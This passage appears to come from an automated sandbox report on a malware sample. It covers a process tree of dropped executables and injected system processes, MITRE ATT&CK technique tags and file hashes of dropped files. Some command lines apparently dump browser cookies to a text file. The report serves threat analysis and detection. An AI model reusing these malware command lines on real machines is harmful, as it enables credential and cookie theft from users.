                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4184
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4536
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5144
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4316
                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                          1⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3276
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                            2⤵
                                                                                            • Drops file in System32 directory
                                                                                            • Checks processor information in registry
                                                                                            PID:1188
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:900
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:3996
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:4708
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:5136
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                          1⤵
                                                                                          • Drops file in Windows directory
                                                                                          • Modifies registry class
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5384
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:4440
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:2692
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                            PID:5864
                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                            1⤵
                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                            PID:5592
                                                                                          • C:\Users\Admin\AppData\Local\Temp\BBEE.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\BBEE.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4244
                                                                                          • C:\Users\Admin\AppData\Local\Temp\BEBE.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\BEBE.exe
                                                                                            1⤵
                                                                                              PID:5000
                                                                                            • C:\Users\Admin\AppData\Local\Temp\C382.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\C382.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:1404
                                                                                            • C:\Users\Admin\AppData\Local\Temp\CEEC.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\CEEC.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5596
                                                                                              • C:\Users\Admin\AppData\Local\Temp\339802969.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\339802969.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:4756
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                  3⤵
                                                                                                    PID:5144
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1230843919.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1230843919.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:4580
                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                    3⤵
                                                                                                      PID:5892
                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                      3⤵
                                                                                                        PID:4800
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D6DD.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\D6DD.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5644
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5876
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:4884
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5432
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:3860
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:5736
                                                                                                        • C:\Windows\explorer.exe
                                                                                                          C:\Windows\explorer.exe
                                                                                                          1⤵
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5336
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:4876
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:4568
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:4276
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                              1⤵
                                                                                                                PID:5240
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                1⤵
                                                                                                                  PID:5500
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:636
                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                  PID:5700
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:5308
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                  1⤵
                                                                                                                    PID:5580
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:4196
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:5860
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                    • Modifies registry class
                                                                                                                    PID:3452
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                    1⤵
                                                                                                                      PID:1844
                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                      1⤵
                                                                                                                        PID:1256

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                      Persistence

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1060

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Defense Evasion

                                                                                                                      Disabling Security Tools

                                                                                                                      2
                                                                                                                      T1089

                                                                                                                      Modify Registry

                                                                                                                      5
                                                                                                                      T1112

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Install Root Certificate

                                                                                                                      1
                                                                                                                      T1130

                                                                                                                      Credential Access

                                                                                                                      Credentials in Files

                                                                                                                      4
                                                                                                                      T1081

                                                                                                                      Discovery

                                                                                                                      Software Discovery

                                                                                                                      1
                                                                                                                      T1518

                                                                                                                      Query Registry

                                                                                                                      4
                                                                                                                      T1012

                                                                                                                      System Information Discovery

                                                                                                                      5
                                                                                                                      T1082

                                                                                                                      Security Software Discovery

                                                                                                                      1
                                                                                                                      T1063

                                                                                                                      Peripheral Device Discovery

                                                                                                                      1
                                                                                                                      T1120

                                                                                                                      Remote System Discovery

                                                                                                                      1
                                                                                                                      T1018

                                                                                                                      Collection

                                                                                                                      Data from Local System

                                                                                                                      4
                                                                                                                      T1005

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files\Windows Portable Devices\LSGVEOOFXJ\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\Windows Portable Devices\LSGVEOOFXJ\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\install.dat
                                                                                                                        MD5

                                                                                                                        806c3221a013fec9530762750556c332

                                                                                                                        SHA1

                                                                                                                        36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                        SHA256

                                                                                                                        9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                        SHA512

                                                                                                                        56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                      • C:\Program Files\install.dat
                                                                                                                        MD5

                                                                                                                        31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                        SHA1

                                                                                                                        c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                        SHA256

                                                                                                                        b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                        SHA512

                                                                                                                        3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                      • C:\Program Files\install.dll
                                                                                                                        MD5

                                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                        SHA1

                                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                        SHA256

                                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                        SHA512

                                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                      • C:\Program Files\install.dll
                                                                                                                        MD5

                                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                        SHA1

                                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                        SHA256

                                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                        SHA512

                                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                      • C:\Program Files\libEGL.dll
                                                                                                                        MD5

                                                                                                                        cc0f81a657d6887e246f49151e60123d

                                                                                                                        SHA1

                                                                                                                        1eb31528501c375817853e09d95b7152858c5b31

                                                                                                                        SHA256

                                                                                                                        31fd8f7d1ab67c7b4f332d2d4518b99d2bb344ac577044b44551cd7e6f58dbbb

                                                                                                                        SHA512

                                                                                                                        8ad3af4b0fef41dc20965429fd4dbb699131e92277f14c8af5882970fd192820c0f0e1a8369dbc8471fcb09fe778fb708c57dfdfcacd14cd6e84a238fcc84198

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                        MD5

                                                                                                                        efa8c02f19d23a645a42fda3613f137a

                                                                                                                        SHA1

                                                                                                                        aaf83888b5a80c1e6974e7c0a3fc6d4f83545e9f

                                                                                                                        SHA256

                                                                                                                        5c1d35ed150236750fb98f8542ec911696cdd85a79c7eb6f6b04b928811922a9

                                                                                                                        SHA512

                                                                                                                        923d9c778b426a2605b25f886e5634fe8683b2ce3262a5a5d0f0b54751de9d8423221d036bfdc1e11026f9693706ad262d9576b83078e78263d5675ca89c1e6b

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                        MD5

                                                                                                                        745db20fd3e289a001fd17d7e73c7b28

                                                                                                                        SHA1

                                                                                                                        6e99d180a44e0f9226672e9c5cfd796561f3e619

                                                                                                                        SHA256

                                                                                                                        d1e8b6205077152ab171194ebac11a5a6afa62be991643d99d7831412eea96c4

                                                                                                                        SHA512

                                                                                                                        8a33dcef7f679f12c34151b0dbacbe738d0d46c75e73f67a93d494117c04376ea3a52ffa5b8adf8b319b380f690b444d2fa1db8d195587bfe938a716869a7a42

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                        MD5

                                                                                                                        8e4ff690acaeb8fbaea2c8a00c0d8c64

                                                                                                                        SHA1

                                                                                                                        f712fe3fd92d167e476a6217bad4986e0739a5d8

                                                                                                                        SHA256

                                                                                                                        29db05c3bd1169d1482479d680bdbf92749b3448d856de33408c6f24c76d013c

                                                                                                                        SHA512

                                                                                                                        834f2f6c67fb46cb005790191796407e87cfd6064930f505c60575f10ece7bb4dede146c8a05f3540d4a7c92815a0a299cac6f4abeadef92ca822ee486abcb55

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                        MD5

                                                                                                                        a6a06a065e4d47d44d21443188e251a7

                                                                                                                        SHA1

                                                                                                                        ed3909e7754d5f563bdd5526b21ae72e55cd7181

                                                                                                                        SHA256

                                                                                                                        082de34d4e4e76b5a31a11ef68ef8af3827d60c7bd6501716fb848fa9ac55c56

                                                                                                                        SHA512

                                                                                                                        b3ce002d66233f6c014c0b827fc62eba44587cc938028e7e42ef4417573eca45c5507bfa52ba8ce42d254e472308b6a9f324ee62b0721e21c38aee8070ed312e

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5EE9003E3DC4134E8CF26DC55FD926FA
                                                                                                                        MD5

                                                                                                                        c3a2dabf443483647390780be5db30d2

                                                                                                                        SHA1

                                                                                                                        e01855096f799a9be8bcb083b669ae90b275a144

                                                                                                                        SHA256

                                                                                                                        d1033f3873a9287d0cf9b7e3d4332c52562f8a9702063fb8c600909bd9455b82

                                                                                                                        SHA512

                                                                                                                        97362337b219ddbb049f99316439eca8cacb1723b2ab4e1a12e1e2fc4615cf26c22c0428baf3ee06627489e9aba4b485b98a418724ea82c9955356069854770b

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                        MD5

                                                                                                                        dfc67b737fbd54d18eaf6c93e9dda94b

                                                                                                                        SHA1

                                                                                                                        2950c70cd77aa9ab621e6c945c695c83d396cc18

                                                                                                                        SHA256

                                                                                                                        2c1e2bae7de509a8b24aafc1cc20da84237826491db6b62eca4e516b3fdd98b9

                                                                                                                        SHA512

                                                                                                                        501c8483ed3715123ef4164d702ff97cdc5694ad7c6fb78411260f02963ee96b5320135312ec96e54afdececb088dfd2bd422d31d3c55490a6bc13d2d06989a6

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log
                                                                                                                        MD5

                                                                                                                        01dbf531523b2e8e3a7777a8c0183665

                                                                                                                        SHA1

                                                                                                                        570c1b33dd59b3c79a3608fecec7436d787f89e5

                                                                                                                        SHA256

                                                                                                                        bcb3daea0eb7c06351af20ad01600961f500062b2deb9b5f1df060092010c27d

                                                                                                                        SHA512

                                                                                                                        4324bd2d96d41014738cf046f6eae7815a258860e9541c1729464416c8b992a26e83027fad442762d7fc94b82b8915f9b6c69c360eb16f356b10a1dbaf7c06d0

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\edb.chk
                                                                                                                        MD5

                                                                                                                        4a4afa74779f87528f2fff791ac8e16d

                                                                                                                        SHA1

                                                                                                                        582c876103811d01cc6675ebb0c5e35687e12f70

                                                                                                                        SHA256

                                                                                                                        28e98bbd17faab3c19b9a69b885fe9da984bc6c0b555a33ea82f2b0d92535691

                                                                                                                        SHA512

                                                                                                                        a10e2de9a8746a420501b8c99e941a17f00b5e73328b31c0a082e1653ecf16f6c25e1cb69036db13c19a68588722094987980cc6b4ebbe5a923bd0bd013b01ac

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb
                                                                                                                        MD5

                                                                                                                        85020c3dacdfb6370fb7534d8369c677

                                                                                                                        SHA1

                                                                                                                        6a83b31f20f583a2d0d1911d410d24c2f19f99da

                                                                                                                        SHA256

                                                                                                                        ae3afbf87a3c07ca88b5a1ff62fa9b586bca477d800a1e2ee9ba2e45f12dbf9e

                                                                                                                        SHA512

                                                                                                                        5d547bc532b49a4bcd7c61b872bdd79b311684533249a8d0fa18ed932d39b28cf4838807b8eb46358a213162da1b71fba05b751e1ae992058e11a87377f0428b

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.jfm
                                                                                                                        MD5

                                                                                                                        ba540f3245e919ca85a8cb56803c7a32

                                                                                                                        SHA1

                                                                                                                        2e0aa35ed6c334a748d7667b5be34d8af48be665

                                                                                                                        SHA256

                                                                                                                        70cc399291053bfee07ff2e4fc31fd533dde1083c051bde19d691d9923cc9b19

                                                                                                                        SHA512

                                                                                                                        2aea6ba4d00456c7c93490011e45b668edb3094252e9c771b60248c554c574cdfaeff5e749f7dfd3d7ef65048b37002230d0eefc866b1f6d6b83ab6ce3681378

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\RecoveryStore.{C283CC2C-27D3-4AF0-8287-5FA60CDEC9BB}.dat
                                                                                                                        MD5

                                                                                                                        50d5271cbec1e4b04f7cf6bd8fd86bbd

                                                                                                                        SHA1

                                                                                                                        261be6d8d36b6f9c3a138504fa8b52973daa95ff

                                                                                                                        SHA256

                                                                                                                        6f60d66a1941b14e5c640e3a85c6bbf1cce766b776ab981c0d3cc7ea71ee0068

                                                                                                                        SHA512

                                                                                                                        f266288e006818f296f1197856fed9ade7da42341977e00d787d3b08eca6453367e953e4e5700681c929a3de6be6b54c8ae6d65c50032d2df9268c228ea48c15

                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\Recovery\Active\{984E2CAA-3F39-4151-80EF-B0F92456F334}.dat
                                                                                                                        MD5

                                                                                                                        ba135b33ac38d8a5b4998790cb1fec31

                                                                                                                        SHA1

                                                                                                                        9b573a903ea5eafbd1c2f886d68fc68ed16fd278

                                                                                                                        SHA256

                                                                                                                        21d826e790b8474f0f329cdc3e5918436f82cda0b1f40a0d1e0d85191b79fdea

                                                                                                                        SHA512

                                                                                                                        98d551bcf37d7aafe991e6def61e4bc4ccbe2efbd7396c5734a34a91a441bbf5a0b48df58fda966e920affda7527cf5011c527cfa5c28d902fadab549566b79a

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3a-a9162-33a-70a90-7bfee9094b849\Kenessey.txt
                                                                                                                        MD5

                                                                                                                        97384261b8bbf966df16e5ad509922db

                                                                                                                        SHA1

                                                                                                                        2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                        SHA256

                                                                                                                        9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                        SHA512

                                                                                                                        b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3a-a9162-33a-70a90-7bfee9094b849\ZHinipudaqa.exe
                                                                                                                        MD5

                                                                                                                        2e91d25073151415f8c39de2262cbba8

                                                                                                                        SHA1

                                                                                                                        32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                        SHA256

                                                                                                                        0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                        SHA512

                                                                                                                        306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

